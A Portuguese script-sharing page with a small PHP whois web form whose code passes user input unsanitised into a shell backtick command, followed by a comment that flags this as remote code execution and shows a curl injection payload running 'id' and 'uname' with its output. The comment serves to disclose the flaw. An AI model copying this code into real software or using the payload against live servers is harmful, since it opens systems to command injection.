Whois em PHP [PHP]

Whois em PHP

Publicado por Perfil removido (última atualização em 14/11/2012)

[ Hits: 7.709 ]

Download whoisphp.php

0 0

Denuncie Favoritos Indicar

Script simples em PHP para consulta whois.

Esconder código-fonte

<?php

/*
 * Scripit PHP para gerar whois 
 * 
 *  code by @Kouback_TR_
 *  http://koubacktr.com/
 *  http://twitter.com/kouback_tr_
 */
  
print"
<title>PHP-Kouback-Whois</title>
<body bgcolor=#000000>
<center><b><font size=6><font color=#FFFFFF>-=Whois=-</font></font></b></center>
<form method='post' action='?action=whois'>
<br>
<b><center><font color=#FFFFFF>Target whois</font></center></b>
<center><input type=text name=target></input></center></pre>
<center><input type=submit value='whois'></input></center>
<br><br><br><br>";

if($_GET['action'] == "whois"){
   
$target = $_POST['target'];
$whois = `whois $target && arp -a`;
print"
<CENTER><TABLE DIR=LTR WIDTH=50% BORDER=1 CELLPADDING=4 CELLSPACING=3><COL WIDTH=256*><TR><TD WIDTH=100% VALIGN=TOP><P><font color=#00FF14 size=2>";
echo nl2br($whois);
print"</P></TD></TR></TABLE></CENTER>";
}

?>

Scripts recomendados

Babelfish Translator 2.0

Exibir IP do cliente

Babelfish Translator

Script PHP para fazer UPLOAD de arquivos

Resolvendo IP para Hostname em PHP

Comentários

[1] Comentário enviado por fvox em 14/11/2012 - 10:06h

Hi.

Muito cuidado ao usar backticks pois é uma alias para a função shell_exec().
Seu código apresenta uma vulnerabilidade conhecida como RCE (Remote Code Execution).

Exploit:
:~$ curl -s "http://localhost/whois.php?action=whois" --data "target=whois fvox; id;uname -srmo #"
[...]
No whois server is known for this kind of object.<br />
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)<br />
Linux 2.6.xx-xx-generic x86_64 GNU/Linux<br />

0 0

[2] Comentário enviado por removido em 14/11/2012 - 19:27h

Obrigado amigo pela dica, e parabéns pela otima visão da falha, a internet precisa de mais gente como vc

0 0